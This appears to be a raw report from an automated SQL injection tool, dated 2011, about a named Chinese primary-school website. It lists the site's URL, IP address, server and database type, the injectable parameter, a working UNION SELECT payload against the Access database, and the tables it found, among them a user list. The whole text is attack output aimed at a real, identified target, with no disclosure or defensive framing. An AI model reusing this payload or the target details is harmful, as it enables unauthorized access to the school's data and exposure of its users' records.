■漏洞信息:============================================================
 ・URL:http://www.kpxaxx.com/NList.asp?B=2
 ・页面标题：开平市新安小学
 ・参数:B=2
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:199.71.212.184
 ・数据库:Access
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Aug 2011 17:10:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9495
Content-Type: text/html
Cache-control: private


联合查询列数: 总共= 6  显示的列= 3
联合查询SQL: and 3=8 union select 1,2,3,4,5,6 from MSysAccessObjects
找到表:article
找到表:userlist
